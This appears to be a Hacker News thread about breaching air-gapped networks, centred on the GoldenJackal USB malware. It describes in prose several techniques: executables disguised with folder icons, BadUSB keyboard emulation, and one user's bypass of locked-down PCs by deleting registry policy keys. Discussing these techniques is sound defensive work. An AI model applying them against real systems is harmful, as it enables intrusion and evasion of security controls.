On the other hand no matter the transport you’re probably going to get owned by well known vulnerabilities in any software processing data from the internet-connected side, if you’re using the air gap as an excuse to avoid patching or otherwise caring about secure coding practices.
As for patching, you would ensure a secure root of trust and only allow read-only media to deliver said updates as another sibling points out
Air gapping is still valuable but it’s still hard to impossible. For example, stuxnet was delivered by an insider. So good physical security and monitoring is also needed to prevent against insider threats.
Anything that does come out of the infected area in-tact has to be cleaned or inspected carefully to ensure it is free of the “sensitive data” infection.
Any device without a screen is somewhat useless here, especially for crypto, because you want to see what you are signing before you sign it.
So you'd snapshot its QR code, hand-carry the slate to air-gapped Computer B, press a button to wake it up, brandish the "copied" QR code in front of B's camera, etc. Maybe even take one and (with careful labeling) put it into a safe, depending on how long you plan to store it.
You could do something similar with a camera and thermal-paper printer, but then the physical artifact needs to be reliably destroyed by manual effort, as opposed to auto-erasure.
https://seedsigner.com/
https://foundation.xyz/passport/
https://store.blockstream.com/products/blockstream-jade-hard...
I’m okay with it taking a minute or two to install software on a high security system, eg, the root cryptography for our military radios.
…maybe I should get into the business of “paper drives”.
https://github.com/coinkite/BBQr
... Plus one more QR code to quit vi(m) when it's accidentally launched.
It doesn't matter whether the smartphone is internet-connected or not, as the slate's contents wouldn't be of any use without hacking one of the machines, and if you could do that, you wouldn't need to hack the slate in the first place.
In contrast, a worker can sign-out a hardened device, and when they return it on the way out you can be reasonably sure they couldn't have easily made copies. Plus the scanner won't capture arbitrary pictures in the first place, and it can be set to auto-wipe after X minutes of inactivity.
If you give people 10 unexposed sheets and require them to return a total of 10 used/unused on the way out, that's susceptible to them smuggling in an unexposed sheet, and you're back to underwear searches again.
This would be a bit slow: say a barcode. If we assume a single barcode can hold 1500 characters (text twice as long as your comment), a blog entry may need 4-5 barcodes. Not undoable.
Such a machine would not have a camera, WiFi, BT, or any input or output mechanism of any kind.
But perhaps we are just saying the same thing, and I just prefer my way of saying it over admitting to yours...
Is it just that the amount of data it holds is more constrained?
Source? Unless you're using something like usb 4 (ie. thunderbolt) usb devices don't have DMA access.
"BadUSB is a computer security attack using USB devices that are programmed with malicious software.[2] For example, USB flash drives can contain a programmable Intel 8051 microcontroller, which can be reprogrammed, turning a USB flash drive into a malicious device.[3] This attack works by programming the fake USB flash drive to emulate a keyboard. Once it is plugged into a computer, it is automatically recognized and allowed to interact with the computer. It can than then initiate a series of keystrokes which open a command window and issue commands to download malware. " -- https://en.wikipedia.org/wiki/BadUSB
That said, cameras are more of a commodity.
QR and typing: see TOTP tokens!
0 - https://spectrum.ieee.org/the-crazy-story-of-how-soviet-russ...
so you consider that someone may be reading and possibly modifying data on any computer/phone you own, okay
> It's one of the reasons I've been very down on cryptocurrencies in general
but you are willing to have form of money that is only accessible via said computer/phone that someone can read and use as if he was you?
how does it work? how's this not a contradiction?
I have a low opinion about the usefulness of cryptocurrencies because true security is so difficult. It's basically impossible, even if you don't make any mistakes.
I really enjoy this kind of stuff, and loved reading about the z-cash ceremony. I'm not going to those lengths to protect my secrets, so I feel it's better if I don't hold a lot of wealth in such a fragile way.
I used to like it, but now I don't. It's still neat, but it's too prone to costly mistakes.
not everyone is a stock marketeer - I personally keep reading bullish as derived from a bully - something clearly negative
[1] https://www.nerdwallet.com/article/investing/bullish-vs-bear...
This is analogous to a power grid stripped of all fuses and circuit breakers to make it easier to design toasters.
We've studied this problem since 1972[1]. Solutions were found (but the Internet Archive is down, so I can't be sure [2] points to the right files now).
[1] https://csrc.nist.rip/publications/history/ande72.pdf
[2] https://web.archive.org/web/20120919111301/http://www.albany...
People have been doing the same for Apple when it tried to bring explicit app permissions to MacOS. https://tidbits.com/2024/08/12/macos-15-sequoias-excessive-p...
That's lazy design, and it doesn't work.
You can make an argument that UAC was part of a similar strategy, but not paying for an EV certificate only results in a one-time annoyance for your users, not a continuous one. UAC is equivalent to Gatekeeper. This permissions nonsense is worse than UAC.
We can all agree UAC and permission flags suck.
and yet, most ecommerce shops easily remember the credit card on file (amazon, steam, etc), and you literally can one click buy.
So, even if you’d need admin confirmation to run each new binary, it wouldn’t help - because no new binaries are executed, just python with a new set of scripts.
And, correct me if I’m wrong, but preventing os from running new scripts would be virtually impossible.
I don't remember the whole details, but I believe it installed an autorun.inf file on all USB drives so that inserting the drive on another PC would install it automatically.
It is strange to me that a security-conscious organisation such as a ministry of foreign affairs would build an air-gapped system this way. Possibly it's a compliance checklist item from their parent organisation, but with no oversight?
The US has "forward deployed" state department personnel that handle information security of embassies and consulates in a standardised way, probably this SE asian country (and the EU organisation) should follow suit.
See: Hezbollah & pagers.
(Also their walkie talkies also exploded.)
* force prompting executing anything off external media
* disallow anything other than input devices for USB
* disallow unsigned binaries from running
* work to require usb peripherals to carry a unique cryptographic signature so that you can easily lock the set of allowed devices once the machine is set up
Heck, a lot of this stuff could be valuable to help secure corporate IT machines too.
Fast forward a few years, and the computer was still running great. The desktop and downloads folders were full of messengers, "flash players" and other malware - but all binaries were throwing cryptic error. Since no one in IT was around or cared, nobody figured out how to edit the allow list. The computer was deemed half-broken. But when neighboring PCs were completely infested, this one could still open, edit, and print office docs flawlessly.
It felt like a magic fix for shared Windows PC security.
ACRORD32.EXE was actually cmd.exe
WINWORD.EXE was actually Mozilla
...and so on
Edit: one of those exes was regedit and every time I sat down I'd delete all the keys named Policies as a routine excersize. After that, restart explorer with one of the tricks. I don't remember the specific one but it wasn't officially documented iirc.
https://superuser.com/questions/335917/how-can-you-do-a-clea...
Physical security is another big factor, there is a long checklist for a SCIF that at some level takes into account TEMPEST type threats that mitigate many attacks on air gapped systems.
And none of these things are the default on commercial software because users want it to be frictionless. They want software to install right away when you plug in a usb drive, etc.
There is basically no security focused pc hardware, aside from maybe raptor systems which isn’t really the same ilk.
Off the top of my head, a lot of these devices and hardware were scam traps by LEO.
I’d go on a limb and say this isn’t a problem anyone actually wants to solve.
All the technical "hacking" happened on the non-air-gapped side, so that that computer would put malware onto the USB with a deceptive presentation (an .exe with an icon to look like a folder and with the same name as an expected folder, while the actual folder was hidden). The rest is social engineering (and Windows not showing the .exe extension).
[1]: `pip3.exe` is an example; it's hard-coded to run the Pip module from `site-packages`, but `pip.py` could be replaced. More to the point, these wrappers are automatically created by Setuptools, to run an arbitrary script specified in the build process, from a "stub" included with Setuptools. (All of this is to work around the lack of support for shebangs, of course.) I don't know if Setuptools can or does sign these wrappers. Probably not.
I think that will greatly reduce the ability to get work done. It's my understanding that the workflow for using these specific airgapped computers involved moving USB thumb drives between computers.
Now you're making me wonder if keyboard firmware could be an attack vehicle.
Does anyone have more details on how this is done?
> It is probable that this unknown component finds the last modified directory on the USB drive, hides it, and renames itself with the name of this directory, which is done by JackalWorm. We also believe that the component uses a folder icon, to entice the user to run it when the USB drive is inserted in an air-gapped system, which again is done by JackalWorm.
[1] https://www.welivesecurity.com/en/eset-research/mind-air-gap...
THAT would probably ensure the user does not suspect anything nefarious has happened, even after the fact.
Now how Windows Defender and other heuristics based firewalls would not treat the malicious EXE with folder icon as a threat and quarantine it immediately -- I dont know.
The "malicious" exe, as I understood it, just boots up Python to run a script, where the actual malice lies. Windows Defender has to treat an executable that does only this as benign - because Python's packaging tools provide such executables (so that Windows users can get applications - including (upgrades to) Pip itself - from PyPI that "just work" in a world without shebangs and +x bits). For that matter, standard tools like Setuptools could well have been used as part of crafting the malware suite.
Presumably they could notice that an .exe has the normal folder icon. But presumably that icon could also be slightly modified in ways that would defeat heuristic recognition but still appear like a folder icon to a not-especially-attentive human.
>Does the malware EXE that now looks like a Folder icon with same name as the last modified actual folder (which is now hidden) ... also redirect the user to the actual folder and its contents in file Explorer after successfully delivering its malicious payload?
I didn't see anything about that in the description of the attack. But I assume that the Python script could accomplish this by just making an appropriate `subprocess.run` call to `explorer.exe`.
Once you can manipulate the code on the firmware, its probably pretty easy to find a kernel level exploit.
Here is a reference with a virus. https://superuser.com/questions/854918/manipulating-firmware...
Yea but that has to be a custom or specific kind of programmable USB device. Or one that somehow unintentionally allows you to reflash its firmware to something else.
And also if anyone ever plugs your malicious USB device into a Mac, they will get a pop-up from macOS that asks you to identify the keyboard. Although maybe if it fakes a specific USB keyboard that macOS knows out of the box, you could avoid that?
>It is probable that this unknown component finds the last modified directory on the USB drive, hides it, and renames itself with the name of this directory, which is done by JackalWorm. We also believe that the component uses a folder icon, to entice the user to run it when the USB drive is inserted in an air-gapped system, which again is done by JackalWorm.
The problems here are to do with how Windows uses and presents file extensions.
OK, you may be overthinking this one
External buses and RF comms present massive attack surfaces that must be locked down with religious fervor including auditing, disabling, and management.
https://ec.europa.eu/commission/presscorner/detail/en/qanda_...
I always thought that the big switch was probably still a massive vulnerability - is it air-gapped or not? When the switch is flicked it only takes milliseconds for an exploit.
Anyway, not sure what happened to those guys in the end.
(This should also include sneakernet!)
Heck every TV show has someone downloading the nuclear plans off Dr. Evil's laptop by...plugging in a USB device when he's distracted by spilling his coffee.
In my experience it doesn’t stop admins connecting an “offline Root CA” to the WiFi network to install their entire suite of server management software — none of which are functional without an active network connection.
Yes, my plan was to physically remove the wifi adapter daughter card. They exposed the CA to gigabytes of third-party software before I turned up to do the setup. Yes, I warned them not to even take the computer out of the box.
Offline anything just breaks people’s brains.
“How do we keep the anti-virus pattern file up to date?”
“You don’t.”
Protection was BitLocker drive encryption with a manually entered (long!) passphrase to decrypt. Backups were to encrypted USB media never plugged into anything else other than a redundant clone of the CA used for DR testing. Everything went into safes.
This design works Well Enough for all but the most demanding purposes, but the whole rigmarole was undone by a well-meaning but naive admin “just doing his job”.
Fibre for networking, PS/2 (with or without) adapters for keyboards and mice, and VGA for monitors.
as an example of what it's still like in some of those spaces, here's a product sheet for a cross-domain chat solution - the screenshot on the second page appears to be CDE. https://owlcyberdefense.com/wp-content/uploads/2020/12/20-OW...
[0] https://github.com/reactjs/react.dev/issues/3896
Namely that (good) library authors will do everything possible to avoid breaking the public API, which can be seen as a “promise” from them in what can be relied upon, while internal/private members offer no such promises and the library author can feel free to change/remove them as desired with no prior notice.
This was more like a controlled environment, but everyone knows that USB/WIFI is a steaming shitpile, with its own firmware and other shit.
Quick FAQ:
> Haven't we known about USB vulnerabilities forever (agent.btz, BadUSB etc.)?
The fact that USB devices were used to transfer the files is irrelevant to the attack.
The attack doesn't depend on running the malware directly off the USB device, on any kind of auto-run vulnerability, etc. It would have worked out the same way if files had been transferred, for example, by burning them to DVD. The attack only depends on the machines on the non-air-gapped side, being compromised such that the attackers can control what is put onto the USB. But the USB drives themselves are only being used as dumb storage here.
The attack instead primarily depends on social engineering that is helped along by the design of the Windows GUI. On the air-gapped machine, the user sees a "folder" which is actually an executable file. By default, Windows hides the .exe file extension (which it uses to determine executability of the file) in the GUI; and the icon can be customized. Double-clicking thus launches the malware installer when it was only supposed to open a folder. The folder has a name that the user expected to see (modulo the hidden extension).
It appears that the original setup involves hiding[1] (but still copying) the folder that was supposed to be transferred, and then renaming the malware to match. (Presumably, the malware could then arrange for Windows to open the hidden folder "normally", as part of its operation.) Windows can be configured to show "hidden" files (like `ls -a`), but it isn't the default.
Notice that this is social engineering applied only to the process of attempting to view the files - nobody was persuaded to use any storage devices "from outside".
> Isn't that, like, not actually air gapped?
The definition of an air gap generally allows for files to be passed across the air gap. Which is all the attack really depends on. See also "sneakernet". The point is that you can easily monitor and control all the transfers. But this attack is possible in spite of that control, because of the social engineering.
> How is it possible to exfiltrate data this way?
The actual mechanism isn't clearly described in media coverage so far, from what I can tell. But presumably, once malware is set up on the air-gapped machine, it copies the files back onto the USB, hiding them. When the device is transferred back to the non-air-gapped side, malware already present there monitors for the USB being plugged in, retrieves the files and uploads them (via the "GoldenMailer" or "GoldenDrive" components) elsewhere.
[0] https://www.welivesecurity.com/en/eset-research/mind-air-gap..., via https://news.ycombinator.com/item?id=41779952.
[1]: Windows file systems generally don't have an "executable bit" for files, but do have a "hidden bit", rather than relying on a leading-dot filename convention. So it's the opposite of what Linux does.
> Next, the infected computer infects any external drives that get inserted. When the infected drive is plugged into an air-gapped system, it collects and stores data of interest. Last, when the drive is inserted into the Internet-connected device, the data is transferred to an attacker-controlled server.
This implies the ability to turn a common USB drive into a vector for malware.